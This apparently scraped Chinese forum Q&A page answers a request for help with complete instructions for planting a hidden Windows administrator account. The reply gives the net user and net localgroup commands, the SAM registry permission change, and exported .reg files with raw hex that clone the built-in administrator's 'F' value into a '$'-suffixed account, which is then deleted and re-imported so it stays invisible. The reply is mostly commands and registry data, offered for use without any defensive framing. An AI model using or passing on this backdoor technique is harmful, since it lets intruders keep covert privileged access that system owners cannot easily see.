如題,真心求教,絕不虧待。
uj5u.com熱心網友回復:
建立隱藏系統用戶先做準備作業,新建一個用戶,名為sxitn$(加上$符號,使用命令net user將查看不到用戶),密碼為123:
net user sxitn$ 123456 /add
然后把sxitn$加入管理組:
net localgroup administrators sxitn$ /add
然后,開始—>>運行,輸入regedt32.exe,找到HKEY_LOCAL_MACHINE下的SAM項下的SAM,點擊右鍵—權限,在安全選項卡中添加用戶組Administrators或者當前用戶,允許完全控制,應用確定后關閉。
開始—>運行,輸入regedit打注冊表。找到HKEY_LOCAL_MACHINE—SAM—SAM—Domains—Aliases—Users—Names—sxitn$,記住右邊的值的型別—>0×3ef,然后匯出,命名為sxitn$.reg;在Users項中找到3ef項,也同樣匯出,命名為3ef.reg;1f4(administrator默認的項)項也匯出,命名為1f4.reg。
用記事本打開1f4.reg,復制:
"F"=hex:02,00,01,00,00,00,00,00,d0,f6,92,be,05,df,c7,01,00,00,00,00,00,00,00,/
00,80,1c,c5,98,94,2d,c7,01,00,00,00,00,00,00,00,00,10,51,1c,cb,08,df,c7,01,/
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,c0,00,01,00,00,00,00,/
00,00,00,00,00,00,00
用記事本打開3ef.reg,把剛才復制的粘貼到相應的位置。
用記事本打開sxitn$.reg,復制:
[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/sxitn$]
@=hex(3ef):
粘貼到3ef.reg最后的位置。最后3ef.reg為:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000003EF]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,/
00,90,97,6d,19,10,df,c7,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,/
ef,03,00,00,01,02,00,00,10,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,/
00,95,7c,4e,2e,20,74
"V"=hex:00,00,00,00,bc,00,00,00,02,00,01,00,bc,00,00,00,0c,00,00,00,00,00,00,/
00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,/
c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,/
00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,/
00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,/
00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,/
08,00,00,00,01,00,00,00,d0,00,00,00,14,00,00,00,00,00,00,00,e4,00,00,00,14,/
00,00,00,00,00,00,00,f8,00,00,00,04,00,00,00,00,00,00,00,fc,00,00,00,04,00,/
00,00,00,00,00,00,01,00,14,80,9c,00,00,00,ac,00,00,00,14,00,00,00,44,00,00,/
00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,/
00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,/
00,58,00,03,00,00,00,00,00,24,00,44,00,02,00,01,05,00,00,00,00,00,05,15,00,/
00,00,5b,84,10,ab,37,d9,e9,d7,09,61,8b,28,ef,03,00,00,00,00,18,00,ff,07,0f,/
00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,5b,03,02,00,/
01,01,00,00,00,00,00,01,00,00,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,/
02,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,73,00,78,00,69,00,/
74,00,6e,00,24,00,01,02,00,00,07,00,00,00,01,00,01,00,c5,3d,41,62,8b,c0,6f,/
1e,57,d2,4c,dc,4e,20,76,a3,01,00,01,00,47,ad,d7,59,3f,ac,4a,a1,f6,dd,c6,d9,/
bc,1e,8d,15,01,00,01,00,01,00,01,00
[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/sxitn$]
@=hex(3ef):
然后保存。洗掉用戶sxitn$:
net user sxitn$ /delete
之后運行3ef.reg匯入注冊表!打開regedt32.exe把SAM安全選項卡中的administrator洗掉,然后應用。
這樣,隱藏用戶就建立好了。
轉載請註明出處,本文鏈接:https://www.uj5u.com/caozuo/156382.html